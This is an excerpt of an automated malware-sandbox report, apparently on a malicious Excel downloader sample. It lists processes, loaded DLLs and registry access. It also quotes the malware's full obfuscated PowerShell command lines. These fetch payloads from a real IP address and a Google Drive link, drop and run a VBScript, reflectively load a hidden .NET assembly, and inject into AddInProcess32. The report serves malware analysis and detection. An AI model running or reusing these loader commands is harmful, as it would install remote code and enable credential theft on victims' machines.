f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdbhP source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdb source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp

Source: 09230000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Obfuscated command line found

